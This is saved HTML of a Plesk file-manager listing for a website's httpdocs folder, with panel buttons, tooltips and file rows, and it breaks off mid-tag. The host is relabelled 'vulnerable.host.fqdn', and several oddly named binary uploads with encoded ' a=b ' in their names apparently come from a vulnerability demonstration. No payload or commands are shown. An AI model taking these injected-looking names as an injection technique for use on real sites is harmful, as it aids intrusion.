<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return 
false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table 
width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A 
name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort 
files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var 
inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if 
(&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" 
onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return 